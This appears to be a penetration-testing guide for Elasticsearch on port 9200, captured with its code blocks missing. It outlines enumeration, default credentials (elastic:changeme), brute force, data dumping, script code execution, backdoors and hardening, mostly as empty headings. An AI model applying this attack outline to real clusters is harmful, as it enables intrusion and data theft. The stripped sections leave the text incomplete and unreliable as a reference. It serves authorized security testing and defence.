Elasticsearch - Port 9200

Basic info

What is Elasticsearch?

Elasticsearch is a distributed NoSQL database that provides:

• Full-text search - Fast, powerful search capabilities

• Real-time indexing - Near-instant data availability

• Horizontal scalability - Add nodes seamlessly

• RESTful API - Simple HTTP/JSON interface

• Multi-tenancy - Multiple indices per cluster

• Aggregations - Analytics and data insights

The Elastic Stack (ELK)

Components:

• Beats - Lightweight data shippers

• Logstash - Data processing pipeline

• Elasticsearch - Search and analytics engine

• Kibana - Visualization and management UI

Data Model

Key Concepts:

• Cluster - Collection of nodes

• Node - Single Elasticsearch instance

• Index - Collection of related documents

• Document - JSON object with data

• Shard - Subset of an index

• Replica - Copy of a shard for redundancy

Inverted Index

Elasticsearch uses an inverted index for fast search:

Use Cases

Real-World Deployments:

• Netflix - Search infrastructure

• LinkedIn - Job search and recommendations

• Uber - Customer support and analytics

• GitHub - Code search

• eBay - Product search

• Stack Overflow - Q&A search

Common Applications:

• Log aggregation and analysis

• Application search

• Security information and event management (SIEM)

• Business analytics

• Metrics and monitoring

• Geospatial data analysis

Default Port

Port 9200 - Elasticsearch HTTP API

Additional Ports:

• 9300 - Transport protocol (node-to-node)

• 5601 - Kibana web interface

Reconnaissance & Enumeration

Port Scanning

Basic Nmap Scan

Sample Output:

Banner Grabbing

Basic Information

Extract Key Information:

• Cluster name

• Node name

• Elasticsearch version

• Lucene version

• Build information

Shodan Queries

Authentication Testing

Check Authentication Status

Unauthenticated Access (Default)

Authentication Enabled

Check Security Configuration

Default Credentials

Common Default Users:

Test Default Credentials:

Brute Force Authentication

Using Hydra

Custom Python Script

Enumeration Techniques

Cluster Information

Basic Cluster Info

Node Information

Index Enumeration

List All Indices

Index Details

User & Role Enumeration

List Users (If Auth Enabled)

List Roles

List Privileges

API Endpoint Discovery

Cat APIs (Administrative)

Data Exfiltration

Search and Dump Data

Basic Search

Query DSL (Domain Specific Language)

Regex Search

Dump Entire Index

Method 1: Simple GET Request

Method 2: Scroll API (Large Datasets)

Method 3: Export with Elasticsearch Dump

Dump All Indices

Search for Sensitive Data

Common Sensitive Fields

Exploitation Techniques

Unauthorized Data Modification

Create Index

Insert Document

Update Document

Delete Data

Code Execution via Scripts

Groovy Scripts (Elasticsearch < 1.5)

Painless Scripts (Elasticsearch >= 5.0)

Known Vulnerabilities & CVEs

CVE-2014-3120: Remote Code Execution (Groovy)

Affected: Elasticsearch < 1.2.0

Exploitation:

Metasploit Module:

CVE-2015-1427: Groovy Sandbox Bypass

Affected: Elasticsearch < 1.3.8, 1.4.x < 1.4.3

Exploitation:

CVE-2021-22145: Denial of Service

Affected: Elasticsearch 7.10.0-7.13.3

Impact: Memory exhaustion via malformed requests

CVE-2023-31419: Authentication Bypass

Affected: Elasticsearch 8.0.0 - 8.7.0

Description: API key authentication bypass in specific configurations

Directory Traversal (Various Versions)

Path Traversal in Snapshot Repository:

Post-Exploitation

Privilege Escalation

Create Superuser (If Auth Enabled)

Modify User Roles

Persistence

Create API Key

Snapshot Backdoor

Lateral Movement

Extract Configuration

Harvest Credentials from Data

Defense & Hardening

Enable Authentication

elasticsearch.yml Configuration:

Set Strong Passwords:

Role-Based Access Control:

Network Security

Bind to Specific Interface:

Firewall Rules:

Reverse Proxy with Authentication:

Disable Dangerous Features

Disable Scripts (If Not Needed):

Disable Dynamic Scripting:

Limit API Access:

Monitoring & Detection

Enable Audit Logging:

Monitor Logs:

Intrusion Detection:

Regular Security Practices

Tools & Scripts

Essential Tools

1. curl - HTTP API interaction

2. elasticdump - Data export tool

3. Metasploit - Exploitation framework

4. esearch - Elasticsearch CLI

5. jq - JSON parsing

Python Enumeration Script

Cheat Sheet

Quick Reference

Important Endpoints

Default Credentials

Conclusion

Elasticsearch, designed for speed and simplicity, often sacrifices security for ease of use in default configurations. The combination of no authentication, powerful REST APIs, and rich data makes exposed Elasticsearch instances extremely valuable targets.

Key Takeaways:

1. Enable X-Pack security - Never run without authentication

2. Change default credentials - elastic:changeme is widely known

3. Network segmentation - Bind to localhost or private network

4. Enable SSL/TLS - Encrypt all communications

5. Implement RBAC - Least privilege access

6. Disable scripting - If not needed

7. Monitor actively - Enable audit logging

8. Regular updates - Apply security patches

9. Limit API access - Restrict destructive operations

10. Defense in depth - Multiple security layers

Attack Vectors:

• No authentication (common default)

• Default credentials

• Information disclosure

• Data exfiltration

• Unauthorized modification

• Script execution (older versions)

• Directory traversal

• API key theft

• Privilege escalation

Remember to only perform these techniques during authorized security assessments. Unauthorized access is illegal and unethical.

Additional Resources

• Elasticsearch Documentation

• Elasticsearch Security

• Securing Elasticsearch

• HackTricks Elasticsearch